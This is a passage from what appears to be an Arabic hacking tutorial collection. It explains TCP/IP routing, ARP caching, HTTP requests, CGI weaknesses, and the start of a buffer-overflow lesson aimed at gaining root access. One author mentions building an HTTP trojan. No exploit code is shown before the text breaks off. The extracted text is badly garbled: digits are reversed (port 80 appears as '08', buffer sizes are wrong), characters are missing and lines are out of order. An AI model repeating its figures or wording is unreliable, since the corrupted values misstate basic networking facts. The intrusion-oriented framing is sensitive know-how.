‫عملیة اتصالت ال ‪ TCP/IP's‬مشابهة لرسال الطرد ‪ .‬اذا اردت ارسال الطرد لشخص یسكن في‬ ‫نفس الشارع الذي تسكن انت فیه ‪ ,‬یمكنك ان تسلم الطرد بنفسك ‪ .‬اذا ارسلت الطرد الي شخص‬ ‫یسكن‬ ‫في أي شارع اخر ‪ ,‬یجب ان یذهب الطرد الي مكتب البرید ‪ ,‬بعد ذلك مكتب البرید سیقرر كیف‪ ‬‬ ‫یسلم‬ ‫الطرد الي الجهة المطلوبة ‪ .‬مكتب البرید یشبه البوابة الفتراضیة ‪      Default Gateway .‬‬ ‫الشكل التالي یوضح ان ال ‪ ROUTER‬یشبه صندوق البرید الذي یوزع الطرود الي الشبكة‪        ‬‬ ‫الصحیحة‪                                                                                 :‬‬ ‫الشكل التالي یصور كمبیوتر ‪ RAAD‬یرسل حزمة بیانات الي جهاز شكولته‪                     .‬‬ ‫بروتوكول ال ‪ IP‬في حزمة ‪ RAAD‬سیحلل عنوان الجهة المرسلة شكلته ویحدد ان شكلته‪      ‬‬ ‫جهازها ‪ Local‬او محلي بالنسبة للجهاز المرسل‪                                    RAAD .‬‬ ‫شكل یوضح عمل الراوتر‪                                                                    ‬‬


‫‪                                            011‬‬ ‫‪::‬الجهاز الهدف او المرسل الیه الحزمة یكون ‪ local‬عندما یحدد ال ‪ IP‬ان الثنین الراسل‪      ‬‬ ‫والجهزة المرسل الیها لها نفس قسم الشبكة في عناوین ال ‪ IP‬التي خصصت لها‪                 .‬‬ ‫اذا كان الجهاز الهدف محلي ‪ Local‬فان ال ‪ IP‬یحتاج الي ان یاخذ عنوان كارت الشبكة من الهدف‬ ‫‪                                                                                           .‬‬ ‫اذا كان الجهاز الهدف بعید ( أي في شبكة اخري ( فان ال ‪ IP‬یبحث في جدول المسارات‪          ‬‬ ‫‪routing table‬عن اوضح طریق الي تلك الشبكة‪                                         .‬‬ ‫اذا و جد في جدول المسارات العنوان او الطریق الذي یریده فان عنوان ال ‪ IP‬یاخذ ال ‪gateway‬‬ ‫او العنوان الذي یرید من جدول المسارات‪                                                      .‬‬ ‫اذا لم یكن هناك عنوان او طریق في الجدول طبعا ‪ , IP‬یحتاج الي ان یاخذ عنوان الكارت للبوابة‪  ‬‬ ‫الفتراضیة‪                                                         default gateway .‬‬ ‫طبعا ده كله سیتم تشریحه في الدروس القادمة‪                                                  .‬‬ ‫تحدید عنوان ال ‪ hardware‬او الكارت‪                                                  ::‬‬ ‫المخطط ادناه تمثیل لعملیة القرار التي یستخدمها ال ‪ TCP/IP‬لیحدد أي من عناوین ال‪           ‬‬ ‫‪hardware‬او كارت الشبكة او ال ‪ Mac address‬هي المطلوبة لرسال الحزمة ‪        :‬‬ ‫‪                                            111‬‬ ‫عندما یخصص ‪ IP address‬ل ‪ host ,‬یقوم مدیر الشبكة ‪ Administrator‬بكتابة عنوان‬ ‫ال ‪ Default gateway‬كجزء من متغیرات ‪ TCP/IP .‬الحزمة سترسل الي البوابة‪         ‬‬ ‫الفتراضیة لل ‪ mac address‬یفترض ان تتجه الي شبكة اخري‪                             .‬‬ ‫‪Default gateway‬بعد ذلك یحدد ما اذا كان ال ‪ IP‬المستهدف موجود علي احد الواجهات او‪ ‬‬ ‫الكروت المدرجة عنده او هو یحتاج الي ان یمرر الحزمة الي ‪ Router‬اخر‪                       .‬‬ ‫باستخدام قیاس اخر ‪ ,‬هذا یشبه الذهاب الي المطار والسفر الي جهة ‪ .‬اذا كان هناك طریق مباشر‪ ‬‬ ‫من‬ ‫المطار الي جهتك ‪ ,‬ستستخدمه ‪ .‬اذا لم یتواجد طریق مباشر سترسل عبر اقرب طریق الي‪    ‬‬ ‫جهتك‪.‬‬ ‫في الخطوة القادمة ال ‪ IP‬یستخدم ‪ ARP‬للحصول علي ال ‪ Hardware address‬للجهاز‪    ‬‬ ‫المستهدف ‪ .‬ال ‪ ARP‬هنا یشبه المحقق الذي سیجد عنوان ال ‪ hardware‬للجهاز المستهدف بناء‬ ‫علي عنوان ال ‪ IP‬الذي یسال عنه ال‪                                Internet Protocol .‬‬ ‫‪ -2‬بروتوكول اقرار العنوان‪              Address Resolution Protocol ::ARP ::‬‬ ‫یقوم هذا البروتوكول بترجمة عنوان ال ‪ IP‬الي عنوان العتاد‪                                      .‬‬ ‫لیترجم ‪ ARP‬عنوان ‪ IP‬اول مكان ینظر فیه هو ‪ ARP cache ,‬وهي مكان في الذاكرة‪        ‬‬ ‫العشوائیة ‪ random access memory::RAM:: ,‬یحفظ فیه ‪ ARP‬عناوین ال ‪    IP‬‬ ‫وعناوین العتاد التي تمت ترجمتها ‪                                                              .‬‬ ‫طیب اذا ال ‪ ARP‬وجد عناوین ال ‪ IP‬و العتاد في ال ‪ ARP cache ,‬فان الحزمة تعنون‪       ‬‬ ‫بعنوان العتاد من غیر بحث زائد ‪                                                               .‬‬ ‫الحالة الثانیة اذا ال ‪ IP address‬غیر موجود في ‪ ARP cache‬یقوم ‪ ARP‬بطلب نشر لكل‪ ‬‬ ‫الجهزة ‪                                                                                      .‬‬ ‫‪::‬بعد ان یتم تخصیص ال ‪ address IP‬لعنوان العتاد ‪ ,‬یخزن في ‪ ARP cache‬لمدة‪       ‬‬ ‫دقیقتین ‪                                                                                       .‬‬ ‫اذا ال ‪ IP‬طلب البحث مجددا لنفس عنوان ال ‪ IP‬في خلل هذه الدقیقتین ‪ ,‬فان المدخل یبقي‪    ‬‬ ‫مرة‬ ‫اخري في ال ‪ ARP cache‬او ذاكرة ال ‪ ARP‬لدقیقتین اخریین ‪ .‬المدخل یبقي في ذاكرة ال‪     ‬‬ ‫‪ARP‬كحد اقصي ‪ 01‬دقائق ‪ ,‬بعد ذلك یتم اخراجها من ذاكرتها ‪                                 .‬‬ ‫‪                                                211‬‬ ‫الصورة ادناه توضح ال ‪                                                     ARP cache‬‬ ‫الذاكرة تحتوي علي ‪ 3‬انواع من البیانات‪                                                     :‬‬ ‫العمود الول یوجد فیه ال ‪ IP address ,‬العمود الثاني ال ‪ Hardware address‬او ال‬ ‫‪MAC ,‬العمود الثالث نجد فیه الوصف لحالة المدخل في ال‪                   ARP cache .‬‬ ‫اذا كان المدخل في ال ‪ ARP cache‬حالته ‪ dynamic‬أي متغیر ذلك في حالة ان العنوان‪    ‬‬ ‫اكتشف خلل عملیة ال ‪ broadcast ,‬واذا كان ‪ static‬او ثابت اذا تم اضافة العنوان‪        ‬‬


‫‪manually‬او یدویا ‪                                                                    .‬‬ ‫ااستخدام النشر للبحث عن ال ‪ hardware address‬او عنوان العتاد‪                     :‬‬ ‫اذا لم یجد ال ‪ ARP‬ال ‪ IP address‬في ذاكرة ال ‪ ARP ,‬فان بروتوكول ‪ ARP‬یبدا بما‪   ‬‬ ‫یسمي ‪ ARP request .‬او طلب ‪  ARP .‬هذا الطلب ینشر في الشبكة المحلیة‪              .‬‬ ‫نشر ال ‪ ARP‬یعنون الي أي جهاز في الشبكة بوضع عنوان ال ‪ hardware‬المستهدف علي‪   ‬‬ ‫القیمة ‪ FF:FF:FF:FF:FF:FF .‬نشر ال ‪ARP‬یحتوي علي عنوان ‪ IP‬الجهة المطلوبة حتي‬ ‫یستطیع المستقبل التعرف علیها ‪ .‬ایضا یحتوي علي عنوان ‪ hardware‬المصدر ‪             .‬‬ ‫بعد ان یصل الي الجهة او الجهاز وتعرف ان النشر هي المقصودة به ‪ ,‬تقوم بوضع ‪ IP‬وعنوان ال‪ ‬‬ ‫‪hardware‬المصدر او المرسل في ذاكرة ال ‪ ARP‬الخاصة بها ‪                            .‬‬ ‫في حال ان ال ‪ ARP packet‬وصلت الي أي جهاز ‪ ,‬فان كارت الشبكة یقوم باخراج الحزمة‪   ‬‬ ‫‪ packet‬من خط الشبكة ویمررها خلل طبقة واجهة الشبكة الي طبقة النترنت وال ‪ ARP .‬ال‪ ‬‬ ‫‪ ARP‬في الوجهة المستقبلة یعمل اختبار للحزم لیري هل الحزمة لعنوان ‪ hardware‬الجهاز‪   ‬‬ ‫المرسل ‪                                                                                 .‬‬ ‫اذا كان طلب ال ‪ ARP‬لیس لذلك الجهاز فان الحزمة ترفض ‪ .‬اذا وجد فیها عنوان ال‪             ‬‬ ‫‪                                           311‬‬ ‫‪hardware‬تبع الجهاز المرسل ‪ ,‬ال ‪ IP‬وعنوان ال ‪ hardware‬لمصدر الحزمة توضع في‬ ‫‪ARP cache ,‬ویتم عمل ‪ ARP reply‬لمصدر الحزمة ‪                             .‬‬ ‫عنوان ‪ hardware‬الهدف سیكون موجودا الن في ‪                      ARP reply .‬‬ ‫عندما تصل اجابة ‪ ARP‬او ‪ ARP reply ,‬ال ‪ IP address‬وال ‪      Hardware‬‬ ‫‪address‬یبقوا في ‪ ARP cache‬لدقیقتین‪                                           .‬‬ ‫‪::‬مصطلحــــــــــــــــــات هـامــــــــــــــــــــــة ‪                                         ::‬‬ ‫‪                                                                                   IP Address‬‬ ‫عنوان یستخدمه ‪ Internet Protocol :: IP ::‬لتعریف شبكة او جهاز‪               .‬‬ ‫‪                                                                        Logical Address‬‬ ‫هذا العنوان یمكن ان یعدل ‪ ,‬ویسمي به الجهاز‪                                             .‬‬ ‫‪                                                                             Subnet mask‬‬ ‫متغیر یتضمن أي عنوان ‪ IP‬موجود في الشبكة‪                                            .‬‬ ‫‪                                                                                            Router‬‬ ‫جهاز یربط ببن الشبكات ویقوم بتحریك حزم البیانات من شبكة الي اخري‪                     .‬‬ ‫‪                                                                       Remote Network‬‬ ‫شبكة غیر الموجود فیها الجهاز ‪ ,‬وهي تقع في الجانب الخر من ال ‪               Router .‬‬ ‫‪                                                                       Default Gateway‬‬ ‫متغیر یكون في عنوان ‪ IP‬الراوتر ‪ ,‬ویستخدم لتمریر ال ‪ packet‬الي شبكة اخري‪          .‬‬ ‫‪                                                                           Routing Table‬‬ ‫الجدول الذي یحتوي علي العناوین التي تشیر الي افضل طریق الي الشبكات الخري‪           .‬‬ ‫‪                                  ::Address Resolution Protocol ::ARP‬‬ ‫بروتوكول یستخدم لترجمة عنوان ‪ IP address‬الي عنوان العتاد ‪hardware address‬‬ ‫‪                                                                                                  .‬‬ ‫‪                                        411‬‬ ‫‪                                                                 ARP cache‬‬ ‫منطقة في الذاكرة تحتوي علي عناوین ال ‪IP‬التي ترجمت حدیثا لعناوین ال‪     hardware .‬‬ ‫‪                                                              ARP request‬‬ ‫الحزم المنتشرة التي تقوم بالبحث عن ترجمة ل عنوان ال ‪ IP‬لعنوان ال ‪      hardware .‬‬ ‫‪                                                                  ARP reply‬‬ ‫الحزم التي ترجع الي الي راسل ال ‪ ARP request‬وتكون محتویة علي ال ‪ IP address‬و‬ ‫ال ‪ hardware address‬اللي طلبهم ال‪                                 ARP .‬‬ ‫‪                                   511‬‬ ‫بروتوكول ال‪ HTTP ‬تحت المجھر‪                  ‬‬ ‫‪                 GET http://www.arabicteam.com/index.html HTTP/1.0‬‬ ‫‪                                                              */* :Accept‬‬


‫‪                                                Accept­Language: ar­sa‬‬ ‫‪                                         Accept­Encoding: gzip, deflate‬‬ ‫‪  (User­Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt‬‬ ‫‪                                            Host: www.arabicteam.com‬‬ ‫‪                                          Proxy­Connection: Keep­Alive‬‬ ‫;*************=‪               Cookie: Username=Kondor; Password‬‬ ‫;‪       language=arabic; Stylesheet=theblues; bblastvisit=985145236‬‬ ‫‪                                             bblastactivity=985145966‬‬ ‫______________________________‪___________________________ ‬‬ ‫حالتین‪                               : ‬‬ ‫ن‬ ‫و في ھذه الحالة علینا التفريق بین‬ ‫ل‪        ‬‬ ‫أو ً ‪-‬استخدام بروكسي (كما في المثال السابق حیث يتم التصال مع ل‬ ‫ال‪   ( arabicteam ‬‬ ‫البروكسي و يتم أرسال البیانات السابقة له لجلب صفحة ل‬ ‫ی ‪-‬التصال مباشر دون بروكسي عندھ ا يتم التصال مع السیرفر المستضیف ا‬ ‫ثان ً‬ ‫ال‪             : index.html ‬‬ ‫للموقع و إرسال البیانات التالیة له لجلب صفحة ل‬ ‫‪                                             GET /index.html HTTP/1.0‬‬ ‫‪                                                              */* :Accept‬‬ ‫‪                                                Accept­Language: ar­sa‬‬ ‫‪                                         Accept­Encoding: gzip, deflate‬‬ ‫‪  (User­Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt‬‬ ‫‪                                            Host: www.arabicteam.com‬‬ ‫;*************=‪               Cookie: Username=Kondor; Password‬‬ ‫;‪       language=arabic; Stylesheet=theblues; bblastvisit=985145236‬‬ ‫‪                                             bblastactivity=985145966‬‬ ‫‪                                                        Connection: close‬‬ ‫ترويسة‪     ‬‬ ‫ة‬ ‫ل‪ GET ‬وھ ي عادة تستخدم لجلب معلومات من الصفحة أي‬ ‫ل‬ ‫أو ً ال‬ ‫ال‪ POST ‬و ھذه الترويسة ھامة‬ ‫ة‬ ‫التصفح العادي لكن ھناك ترويسات أخرى مثل ل‬ ‫‪                                  116‬‬ ‫اا‪     ‬جد ً و ھ ي تستخدم لرسال بیانات إلى السیرفر (البیانات الطويلة) لن ال ‪ get‬‬ ‫‪  post‬‬ ‫‪p‬‬ ‫عاجز عن أرسال بیانات ضخمة تزيد عن ‪ 00056‬بايت على ما أعتقد و ال‬ ‫تستخدم بكثرة بال ‪ cgi‬و ال ‪ php‬و غیرھا‪                                     ..‬‬ ‫و يوجد ترويسة ال ‪ HEAD‬و ھي غیر مشھورة و نادرة الستخدام لنھا تستخدم‬ ‫م‬ ‫عادة لجلب معلومات عن ملف دون تحمیله ‪                                  ..‬‬ ‫حالتین‪                         ‬‬ ‫ن‬ ‫ی ‪ -‬عنوان الصفحة المطلوبة و ھنا نفرق بین‬ ‫ثان ً‬ ‫اا‪                                                                           ‬‬ ‫الولى التصال مع البروكسي عندھ ا نعطیه العنوان كامل أي مثل ‪             ::‬‬ ‫‪                                  http://www.arabicteam.com/index.html‬‬ ‫مثل‪ ‬‬ ‫و الخرى التصال بالموقع مباشرة عندھ ا نطلب منه عنوان الملف فقط أي ل‬ ‫‪                                                                             :‬‬ ‫‪                                                                 /index.html‬‬ ‫ل‪                                                ‬‬ ‫ل‬ ‫أو ‪ dir1/dir2/index.html /‬مث ً‪                                                ‬‬ ‫ث ‪ -‬يجب أن يتبع العنوان بالترويسة ‪ HTTP/0.1‬أو ‪ HTTP/1.1‬و ھي دتل على ا‬ ‫ثال ً‬ ‫الصدار لل ‪ http‬و ھ ناك فرق بین الصدارين مثل أقفال التصال بعد انتھاءء‪       ‬‬ ‫الرسال ‪                                                                    ..‬‬ ‫رابعً ‪ -‬الترويسات الختیارية عدى ال ‪ :host‬وھي تحدد نوع ال ‪ mime‬و نظام ا‪    ‬‬ ‫إضافیة‪    ‬‬ ‫ة‬ ‫التشغیل و اللغة و ما إلى ذلك من معلومات إضافیة و لرؤية معلومات‬ ‫‪                                                          . MIME‬‬ ‫‪.‬‬ ‫عن أنواع ال‬ ‫‪     ­http://www.isi.edu/in­notes/iana/assignments/media­types/media‬‬ ‫‪                                                                      . types‬‬ ‫لكن ما يھمنا ھنا ھو الترويسة الضرورية و ھي ال ‪ :HOST :‬و يأتي بعدھا‪      ‬‬


‫عنوان السیرفر أي مثل ‪                                                      :‬‬ ‫‪                                              HOST: www.arabicteam.com‬‬ ‫المر الذي استفدنا منه ھ و كیف نتصفح النترنت عبر التلنت أو أي برنامج اتصال‬ ‫عادي و أصبح لدينا المعلومات الكافیة لصنع برنامج يستخدم ھذا البروتوكول ‪ ...‬‬ ‫‪                                      711‬‬ ‫ملحظة‪ :‬يمكن الستفادة من برامج ال ‪ Sniffers‬لتحلیل البیانات الخارجة و‪    ‬‬ ‫ض للتعلم أكثر عن‪     ‬‬ ‫الداخلة للجھاز و تحلیل كل الباكیتس و التعلم منھا و أي ً‬ ‫ا‪                     ‬‬ ‫البروتوكولت ‪                                                              .‬‬ ‫و عند أرسالك لھذه المعلومات للسیرفر فسیرسل لك السیرفر الملف المطلوب‬ ‫ا‪               ‬‬ ‫ض ضمن ترويسات و ضمن نظام محدد سنشرحھا فیما بعد ‪.‬‬ ‫أي ً‬ ‫و الدرس الذي يلیه سنتكلم بأعماق التصالت و كیف يتم يتم ال ‪. Traceroute‬‬ ‫برنامج ال ‪ http‬تروجان (الذي ھ و تروجان يستخدم البروتوكول ال ‪) http‬انتھى‪  ‬‬ ‫العمل من ‪ %99‬منه لكني في النھاية توقفت عن العمل به لني وجدته دون‪   ‬‬ ‫جدوى ‪                                                                   .‬‬ ‫‪                                     811‬‬ ‫ماھو ‪                                  CGI‬‬ ‫للكاتب‪                                                          KING_ABDO:‬‬ ‫(‪ )1‬مقدمة للـ ‪                                                           CGI‬‬ ‫‪ CGI=COMMON GATEWAY INTERFA CE‬ھي الواجھة التي تسمح بالتصال‪  ‬‬ ‫بین جانب المستخدم عن طريق المتصفح أو البرامج‪                            ‬‬ ‫و خلفه و جانب الويب سیرفر الذي يفھم بروتوكول (‪                     (HTTP‬‬ ‫الـ ‪ TCP/IP‬ھو البروتوكول الذي يستخدمه سكريبت السي جي أي و السیرفر‪  ‬‬ ‫أثناء التصال ‪ .‬البورت المحددة‪                                                  ‬‬ ‫لھذا البروتوكول ھي ‪ ( 08‬من الممكن أن تتغیر ھذه البورت)‪                     ‬‬ ‫تستطیع سكريبتات السي جي أي أن تقوم بتولید صفحات الويب و الصور و أيضا‬ ‫نتائج محددة طبقا لمدخلت معینه يقوم‪                                         ‬‬ ‫مبرمج السي جي أي بتحديدھا‪                                                ‬‬ ‫يقوم عمل سكريبتات السي جي أي علي خطوتین أساسیتین ‪               :‬‬ ‫‪ -1‬في الخطوة الولى يقوم السكريبت بعمل معالجة أولیه للبیانات التي أدخلت‬ ‫له‪                                                                            ‬‬ ‫‪ -2‬في الخطوة الثانیة يعمل السكريبت كقناه للبیانات التي يقوم المتصفح‪      ‬‬ ‫بارسالھا الي السیرفر أو العكس‪                                                ‬‬ ‫يقوم سكريبت السي جي أي بتشفیر البیانات حتي تتمكن من العمل في أي‪ ‬‬ ‫مناخ للعمل‪                                                                    ‬‬ ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة‪   ‬‬ ‫مثل الفیجوال بیسك‪                                                           ‬‬ ‫أو لغة مترجمة مثل البیرل و الفرق الوحید بین نوعین اللغات أن البرنامج‪         ‬‬ ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفیذ و لكن اللغات المترجمة‪ ‬‬ ‫‪                                       911‬‬ ‫أسرع في عملیة التطوير‪                                                  ‬‬ ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‪                 ‬‬ ‫أھ م الوامر التي تعتبر وثیقة الصله لموضوعنا ھي كالتالي ‪                   :‬‬ ‫‪ GET -1‬ھذا المر يقوم بطلب بیانات من السیرفر للمتصفح‪                     ‬‬ ‫‪ POST -2‬ھذا المر يطلب من السیرفر قبول المعلومات المدخلة الیه من‪      ‬‬ ‫المتصفح‪                                                                   ‬‬ ‫‪ PUT -3‬ھذا المر يطلب من السیرفر قبول المعلومات المرسله الیه كبديل عن‪ ‬‬ ‫المدخلت الموجودة حالیا‪                                                 ‬‬ ‫(‪ )2‬نقاط الضعف‪                                                           ‬‬ ‫نقاط الضعف التي يسببھا سكريبت السي جي أي لیس ضعفا في السي جي‬


‫أي نفسه و لكنه‪                                                           ‬‬ ‫ضعف في بروتوكول الـ‪ HTTP‬أو في أنظمة التشغیل المختلفة‪                  ‬‬ ‫السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن ھناك طرق‪     ‬‬ ‫أخري للوصول الي تحطیم النظام‪                                          ‬‬ ‫المني ‪ .‬كمثال يمكن الوصول الي الملفات الغیر محمیة باستخدام الـ ‪ FTP‬أو‪  ‬‬ ‫‪                                                                   TELNET‬‬ ‫‪                                   021‬‬ ‫ماھو ‪                      Buffer Overflows‬‬ ‫للكاتب‪                                                              LAMeR:‬‬ ‫اقدم لكم درس يشرح ما معنى الـ ‪ .. Buffer Overflows‬وانشاالله تستفیدون‪   ‬‬ ‫منه‪                                                                           ‬‬ ‫يله نبدأ‪                                                                       ‬‬ ‫محتويات الدرس‪                                                             :‬‬ ‫‪ - 1‬ما ھو الـ ‪ Buffer Overflow‬؟‪                                            ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­<‪                                                   ‬‬ ‫‪ - 2‬المعالجه(‪                                                     (Proccess‬‬ ‫­­­­­­­­­­­­­­­­­<‪                                                            ‬‬ ‫‪ - 3‬إدارة الذاكره (‪                                (management Memory‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪                                             ‬‬ ‫‪ - 4‬استغلل ماذكر في الـ ‪                               Buffer Overflow‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪                                           ‬‬ ‫* ماذا يجب أن أعرف قبل أن أقرأ ھذه المقالة؟‪                             ‬‬ ‫لیس الكثیر‪ ،،،‬فھ ذا دلیل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة‪    ‬‬ ‫أساسیة بمفھ وم برامج الحاسوب وإدارة الذاكرة‪                            ‬‬ ‫‪- 1‬ما ھو الـ ‪Buffer Overflow‬؟‪                                             ‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­<‪                                                    ‬‬ ‫‪  Overflow Buffer‬حالة تحدث لبرنامج بسبب برمجة سیئة أو بمعنى اخر برمجة‬ ‫تحمل أخطاء‪                                                                 .‬‬ ‫احدث ثغرة يمكنك أستغللھا من نوع ‪ Buffer Overflow‬تسمى فايروس '‪ code‬‬ ‫‪                                  121‬‬ ‫‪ ، 'red‬التي أستغلت في خادم ‪ IIS‬لمايكروسوفت ‪         ­ MS web server-‬‬ ‫عموما‪ ،‬يحدث ‪ Buffer Overflow‬عندما يظھ ر برنامج ما متّغر بحجم ثابت (على‬ ‫ی‪                   ‬‬ ‫سبیل المثال‪،‬حجم ‪ 02‬بايت) و القیمة التي خ ّصت إلى ھذه المتّغر أكبر من‪ ‬‬ ‫ص‪          ‬‬ ‫ی‬ ‫حجم المتّغر‪                                                              .‬‬ ‫ی‪                                                                ‬‬ ‫خذ ھذا المثال‪                                                            :‬‬ ‫يظھر برنامجي على الشاشة ھ ذه الجملة‪" :‬رجاء إطبع اسمك الول‪" :‬ثم‪      ‬‬ ‫سیأخذ برنامجي من المستخدم البیانات التي سیدخلھا وھي (اسمه الول)‪  ‬‬ ‫ثم توضع في متغیر فتظھ ر في برنامجي او تخزن‪                            .‬‬ ‫المشكلة ھ نا تكمن في انه إذا كان المتّغر مخصص لتخزين بیانات حجمھا‪     ‬‬ ‫ی‪                                  ‬‬ ‫القصى يساوي ‪ 51‬بايت والبیانات ھنا(وھي اسم المستخدم)حجمھا ‪ 52‬بايت‬ ‫التي ستخزن في المتغیر (يتضح لنا ان اسم المستخدم وضع في مكان اقل‪   ‬‬ ‫من حجمه )‪                                                               .‬‬ ‫اذن ماذا سیحدث للبیانات الزائدة عن ‪ 51‬بايت من المؤكد انھا سـ"تطفح‪       ‬‬ ‫‪ "Overflow‬على الذاكرة التي خ ّصت لمتّغر السم‪                       .‬‬ ‫ص‪                                ‬‬ ‫ی‬ ‫عندما يبدأ البرنامج‪ ،‬تخ ّص الذاكرة ‪                                       :‬‬


‫ص‪                                                  ‬‬ ‫‪                    >1<memory Other things in><vname><var2><var‬‬ ‫‪                                                               01b 6b 15b‬‬ ‫(‪ var 1‬و ‪ var 2‬متّغرات لیست لھا علقة بالسم المدخل ‪ vname,‬المتّغر الذي‬ ‫ی‪      ‬‬ ‫ی‬ ‫حجمه ‪ 51‬بايت‪                                                            ‬‬ ‫وھو الذي سیحتوي السم الذي سیدخله المستخدم)‪                      ‬‬ ‫نفترض ان المستخدم سیدخل السم " ‪      abcabcabcabcabcabcabcabca‬‬ ‫‪ "bc‬حینھا ستبدو الذاكره ھكذا‪                                            :‬‬ ‫‪                                            somevalue2avalusabcabcabc‬‬ ‫‪                                                    abcabcabcabcabcabc‬‬ ‫‪                     >1<other things go here>< vname><var2>< var‬‬ ‫اذا ماذا حدث ؟؟ المتّغر ‪" vname‬طفح ‪ "overflowed‬بسبب البیانات المدخلة‪ ‬‬ ‫ی‪                                                    ‬‬ ‫علیه من قبل المستخدم و قیمة "‪ other things in memory‬أشیاء اخرى في‪ ‬‬ ‫الذاكره" تّغرت بسبب فیض(‪ (overflow‬الحروف من ادخال المستخدم‪        .‬‬ ‫ی‪                                                                 ‬‬ ‫‪                                   221‬‬ ‫اذن كیف أستغ ّ ھذا الخطأ؟؟؟‪                                             ‬‬ ‫ل‪                                                            ‬‬ ‫قبل أن نصل إلى الجواب‪ ،‬ھناك بعض الشیاء الساسیة المھمة التي يجب‪   ‬‬ ‫علینا أن نعرفھا حول تركیب وبنیة الحاسوب ‪                                .‬‬ ‫في ھذه المقالة سنناقش نظام لینكس ‪ ،linux‬لكن المفھوم مماثل لباقي‪   ‬‬ ‫النظمة‪                                                                      .‬‬ ‫‪-2‬المعالجه(‪                                                    :(Proccess‬‬ ‫>­­­­­­­­­­­­­­­­<‪                                                          ‬‬ ‫ن‪       ‬‬ ‫إ ّ الوحدة الوظیفیة الساسیة في حاسوب يعمل ھي عملیة المعالجه‬ ‫(‪.(Proccess‬في الحاسوب ھنالك العديد من العملیات ونظام التشغیل مسؤول‬ ‫عن تقسیم الق ّة التي تجعل العديد من العملیات تعمل في نفس الوقت في‪ ‬‬ ‫و‪                                                             ‬‬ ‫الحاسوب‪                                                                    .‬‬ ‫لیس ھناك شيء إسمه "متعددالعملیات ‪ "Multi­ proccesses‬صحیح‪ ...‬كیف‪ ‬‬ ‫اذن؟؛ ا ّ وحدة المعالجة المركزية(‪ (CPU‬تنتقل بین العملیات ك ُ على حده‪   ‬‬ ‫ن‪              ‬‬ ‫ل‬ ‫بسرعة كبیره بحیث تبدو مثل العديد من المھام التي تعمل في وقت واحد‪  ،‬‬ ‫اذا تبدو لنا كأن العملیات تعمل في وقت واحد وھذه من خدع الحاسوب التي‪ ‬‬ ‫يؤديھا علینا ‪                                                            .. ):‬‬ ‫ل‬ ‫ك ّ عملیة لھ ا عنوان فاضي من الذاكره ‪ ،‬وليمكن لي عملیةآخرى تدخل في‬ ‫ھذا المكان الفاضي من الذاكرة‪ .‬وھذا يرشدنا الى شي اخر يجب ان تفھمه‪  ‬‬ ‫وھو‪                                                                         :‬‬ ‫‪ -3‬إدارة الذاكره (‪                                  :(management Memory‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪                                             ‬‬ ‫تدير أنظمة التشغیل‪ ­operating systems-‬الحديثة ذاكرة افتراضیة ‪    virtual‬‬ ‫‪)memory‬تخیلیة)‪                                                          .‬‬ ‫ذلك يعني بّأه ليمكن لي تطبیق (برنامج مثل) الوصول مباشرة إلى الذاكرة‪ ‬‬ ‫ن‪                                                                ‬‬ ‫الحقیقیة‪.‬لماذا؟؟‪                                                            ‬‬ ‫انظمة التشغیل ‪ Operating System‬تمتلك جدول تخطیط "تحويل العناوين‪    ‬‬ ‫الحقیقیة من الذاكرة الى عناوين افتراضیة(تخیلیة)" ‪                        .‬‬ ‫‪                                    321‬‬


‫وعندما تقوم ذاكرة الـ ‪ ) OS‬نظام التشغیل)بتحديد مكان في الذاكرة لبرنامج‪     ‬‬ ‫معین لتشغیله ‪،‬يأخذ البرنامج العنوان التخیل ّ فقط ‪ ،‬ولیس العنوان الطبیعي‪  .‬‬ ‫ي‪                                  ‬‬ ‫و ھ نالك استخدام اخر للذاكرة الفتراضیة(التخیّلة) وھي انه من المعلوم أن‪    ‬‬ ‫ی‪                                ‬‬ ‫الذاكرة الحقیقیة ل ترتبط مباشرة بكل عملیة (أو برنامج)‪ ،‬فنظام التشغیل‪      ‬‬ ‫يستخدم مساحة على القرص الصلب كذاكرة‪                                  ،‬‬ ‫والتطبیق ل يمكنه أبدا معرفة مكان الذاكرة ( مكان الذاكرة الحقیقة )‪،‬ذلك لن‪   ‬‬ ‫المساحة المخصصة للذاكرة في القرص الصلب تتبدل وتتغیر‪                   .‬‬ ‫توضیح ‪ .:‬ان الذاكرة ل تنقسم الى ذاكرة حقیقة وذاكرة افتراضیة بل أنھما‪       ‬‬ ‫ينتمیان لذاكرة واحد‪                                                          ‬‬ ‫اذن ما فائدة التسمیة الى حقیقیة وافتراضیة ؟؟ الجواب ھو للمتییز فقط ‪ ،‬حیث‬ ‫ان الذاكرة الحقیقة تمثل مساحة معینة من القرص الصلب (ومكان ھذه‪         ‬‬ ‫المساحة في تغیر مستمر) لذلك سمیت حقیقیة او بمعنى اخر طبیعیة (اي‪   ‬‬ ‫بأستطاعتك لمس مكان الذاكرة الطبیعیة بیدك على القرص الصلب)‪             ‬‬ ‫وفائدة الذاكرة الفتراضیة ھي إعطاء عنوان افتراضي (غیر حقیقي ) للذاكرة‪     ‬‬ ‫الحقیقیة اي يعطي عنوان كأسم فقط لمكان مساحة الذاكرة الطبیعیة في‪      ‬‬ ‫القرص الصلب ‪ ،‬وإن تغیر مكان المساحة المخصصة للذاكرة يظل العنوان‪         ‬‬ ‫الفتراضي(التخیلي) ثابت‪                                                   .‬‬ ‫‪ - 4‬استغلل ماذكر في الـ ‪                                    Overflow Buffer‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪                                            ‬‬ ‫الن نصل إلى الجزء الھم والمرح‪                                             ‬‬ ‫كیف نستفید من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى‪   ‬‬ ‫الجذر (‪  (Root‬وأختراق النظام؟ تذ ّر نحن قلنا في وقت سابق بّأه عندما يكون‬ ‫ك‪                ‬‬ ‫ن‬ ‫الدخال(البیانات) من 